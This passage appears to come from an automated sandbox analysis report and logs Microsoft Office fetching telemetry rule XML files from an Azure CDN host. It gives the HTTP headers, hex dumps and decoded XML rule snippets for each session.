                                                                                                                  2024-11-14 14:01:02 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1368
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                  ETag: "0x8DC582BDDC22447"
                                                                                                                  x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7f7lhvnhC1DFWa2k00000000khg00000000fv19
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  141192.168.2.44992713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:03 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:03 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1401
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                  ETag: "0x8DC582BE055B528"
                                                                                                                  x-ms-request-id: ce92c93d-101e-008e-6ea0-34cf88000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-1749fc9bdbd4dqj6hC1DFWr4n400000002rg000000002f6z
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:03 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  142192.168.2.44992813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:03 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:03 UTC538INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1364
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                  ETag: "0x8DC582BE1223606"
                                                                                                                  x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7fkcrm9hC1DFWxdag0000000ky0000000001cy5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:03 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  143192.168.2.44992913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:03 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:03 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1397
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                  ETag: "0x8DC582BE7262739"
                                                                                                                  x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7f7scqbhC1DFW0m5w0000000kn000000000737a
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:03 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  144192.168.2.44993113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:03 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:03 UTC538INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1403
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                  ETag: "0x8DC582BDCB4853F"
                                                                                                                  x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7f76p6chC1DFWctqw0000000kr000000000k8v8
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  145192.168.2.44993013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:03 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:03 UTC538INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1360
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                  ETag: "0x8DC582BDDEB5124"
                                                                                                                  x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7f8dwtrhC1DFWd1zn0000000ky0000000001f4r
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  146192.168.2.44993413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:04 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:04 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1366
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                  ETag: "0x8DC582BDB779FC3"
                                                                                                                  x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7fp6mhthC1DFWrggn0000000ktg00000000e5pr
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:04 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  147192.168.2.44993513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:04 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:04 UTC538INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1397
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                  ETag: "0x8DC582BDFD43C07"
                                                                                                                  x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7fj897nhC1DFWdwq40000000kng000000005yhf
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:04 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  148192.168.2.44993613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:04 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:04 UTC517INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1360
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                  ETag: "0x8DC582BDD74D2EC"
                                                                                                                  x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7fcjqqhhC1DFWrrrc0000000kq000000000c2cr
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:04 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  149192.168.2.44993713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:01:04 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:04 UTC515INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1427
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                  ETag: "0x8DC582BE56F6873"
                                                                                                                  x-ms-request-id: 384ed142-801e-0047-1f8c-327265000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7f22sh5hC1DFWyb4w0000000ks00000000011ry
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:04 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

